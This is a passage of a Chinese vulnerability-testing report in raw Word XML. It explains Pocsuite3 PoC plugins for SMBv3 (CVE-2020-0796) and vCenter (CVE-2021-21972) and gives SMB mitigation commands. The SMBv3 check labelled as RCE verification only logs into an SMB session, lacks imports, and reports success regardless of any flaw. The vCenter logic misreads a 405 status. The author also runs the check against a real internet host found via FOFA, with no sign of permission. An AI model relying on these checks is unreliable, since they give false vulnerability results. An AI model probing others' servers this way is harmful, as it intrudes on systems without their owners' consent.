          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>from smbprotocol.session import Session</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>import sys</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>class CVE_2020_0796_PoC(POCBase):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    vulID = 'CVE-2020-0796'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    version = '1.0'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    author = ['Your Name']</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    vulDate = '2020-03-10'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    createDate = '2023-07-24'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    updateDate = '2023-07-24'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    references = ['https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796']</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    name = 'CVE-2020-0796 SMBv3 RCE'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    appPowerLink = 'https://docs.microsoft.com/en-us/windows-server/storage/file-server/troubleshoot/smb'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    appName = 'SMBv3'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    appVersion = '3.1.1'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    vulType = 'Remote Code Execution'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    desc = 'This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SMBv3.'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    def _options(self):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        o = {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            "servername": OptString("", description="The target server name or IP address"),</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            "username": OptString("fakeusername", description="Username for SMB session"),</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            "password": OptString("password", description="Password for SMB session")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        return o</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    def _verify(self):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        result = {}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        servername = self.get_option("servername")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        username = self.get_option("username")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        password = self.get_option("password")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        if not servername:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            return self.parse_output(result)</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        try:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            connection = Connection(uuid.uuid4(), servername)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            connection.connect()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            session = Session(connection, username, password)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            session.connect()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            result['VerifyInfo'] = {}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            result['VerifyInfo']['Server'] = servername</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            result['VerifyInfo']['Username'] = username</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            result['VerifyInfo']['Password'] = password</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            return self.parse_output(result)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        except Exception as e:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            result['Error'] = str(e)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            return self.parse_output(result)</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    def parse_output(self, result):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        output = Output(self)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        if result:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            output.success(result)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        else:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">            output.fail('No response from target or unable to establish SMB session')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        return output</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>register_poc(CVE_2020_0796_PoC)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/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修复方案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1.补丁</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>微软已经发布了此漏洞的安全补丁，访问如下链接：</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796" \t "https://www.cnblogs.com/zhaijiahui/p/_blank" </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.临时解决方案</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>禁用SMBv3压缩</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>禁用SMB 3.0的压缩功能，是否使用需要结合自己业务进行判断。</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>使用以下PowerShell命令禁用压缩功能，以阻止未经身份验证的攻击者利用SMBv3 服务器的漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>Set-ItemProperty-Path“HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 1 -Force</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>用户可通过以下PowerShell命令撤销禁用压缩功能</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>Set-ItemProperty-Path“HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 0 -Force</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>注：利用以上命令进行更改后，无需重启即可生效；该方法仅可用来防护针对SMB服务器（SMB SERVER）的攻击，无法对SMB客户端（SMB Client）进行防护。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>设置防火墙策略关闭相关端口</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>SMB的TCP 445端口</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>NetBIOS名称解析的UDP 137端口</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>NetBIOS数据图服务的UDP 138端口</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>NetBIOS会话服务的TCP 139端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc24933"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.2 VMWare vCenter Server 远程代码执行漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc3767"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.2.1 POC插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是poc编写过程、各部分的含义以及最后的验证结果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4.2.2.1 POC编写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.导入模块：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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python 和 # coding: utf-8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:ind w:left="440" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示这是一个Python脚本，并且使用UTF-8编码。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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from urllib.parse import urljoin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:ind w:left="440" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导入urljoin函数，用于安全地拼接URL。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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">from pocsuite3.api import </w:t>
      </w:r>
      <w:r>
        <w:t>POCBase, Output, register_poc, logger, requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:ind w:left="440" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从Pocsuite3框架中导入必要的类和函数，帮助创建、输出和注册POC。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.定义DemoPOC类：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t>class DemoPOC(POCBase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:ind w:left="440" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个类继承自POCBase，用于定义一个漏洞检测的POC。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.基础信息填写：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据官方漏洞公告获取该漏洞的ID、版本、名称、类型、提交日期等信息，按照标准格式填入代码中。字段不是必须的，可以留空。具体信息这里不做赘述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.编写_verify方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该方法用于实际验证目标是否存在漏洞。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t>vul_url = urljoin(self.url, "/ui/vropspluginui/rest/services/uploadova")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:ind w:left="440" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先通过urljoin构造目标URL——vul_url，它是针对上传OVA文件的REST API的URL。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ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着发送两个GET请求：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ind w:firstLine="420" w:firstLineChars="175"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t>sp1 = requests.get(self.url)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ind w:firstLine="420" w:firstLineChars="175"/>
      </w:pPr>
      <w:r>
        <w:t>resp2 = requests.get(vul_url)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="175"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个请求发送到目标URL（self.url），检查返回的内容中是否包含/vsphere-client，表明目标是vCenter。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="175"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个请求发送到vul_url，检查返回的HTTP状态码是否为405（表示不支持该请求方法）。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t>if '/vsphere-client' in resp1.text and resp2.status_code == 405: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                result['VerifyInfo'] = {}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                result['VerifyInfo']['URL'] = self.url</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果满足这两个条件，则说明存在漏洞，并将相关信息存储在result字典中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.编写_attack方法：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t>return self._verify()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:ind w:left="440" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用_verify方法，实际上执行漏洞验证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.编写parse_output方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该方法用于格式化输出结果。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  <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>if result: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            output.success(result)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        else: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            output.fail('Internet nothing returned')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="1"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="1"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="1"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="1"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果result有内容，则调用output.success(result)返回成功的信息；如果没有，则返回失败的信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.注册POC：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Chars="0"/>
      </w:pPr>
      <w:r>
        <w:t>register_poc(DemoPOC)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:ind w:left="440" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将该POC注册到Pocsuite3框架中，以便可以进行漏洞扫描和检测。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总体而言，这段POC代码的目的是检测特定版本的VMware vCenter是否存在未授权的RCE漏洞，通过向目标 URL 发送 HTTP 请求并检查响应状态码来判断是否存在漏洞。漏洞的利用路径为：/ui/vropspluginui/rest/services/uploadova。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果状态码为 405，表示服务器在该路径上拒绝了 GET 方法的请求，即服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>器没有限制 HTTP 方法，可以执行恶意操作，漏洞存在。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4.2.2.2 POC验证结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先在fofa上查找符合漏洞存在条件的外网测试目标</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1800225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="13758293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29381" name="图片 2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接着，通过下面指令在kali上搭建pocsuite环境：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一步，执行sudo apt update指令，更新本地软件包索引，确保后续安装或升级软件时能获取到最新版本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2014220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="4015564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6464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第二步，执行sudo apt install python3-pip，安装python3和pip（截图里显示已经安装过最新版本）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1193165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="6056726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672697" name="图片 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第三步，切换root身份，执行pip3 install pocsuite3，通过pip3来安装pocsuite3。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1891030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9843457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5784" name="图片 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配置完成后可以通过pocsuite </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>version来验证pocsuite是否成功安装，并查看pocsuite的版本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:smallCaps/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:spacing w:val="5"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1214120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="11409027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02751" name="图片 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配置成功后，使用指令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pocsuite -r ./vsphere_client_cve-2021-21972.py -u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://178.237.192.2:9144</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  --verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在目标URL上验证是否存在漏洞。其中</w:t>
      </w:r>
      <w:r>
        <w:t>vsphere_client_cve-2021-21972.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为poc代码。下面为成功在目标URL上找到漏洞的截图。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1543050"/>
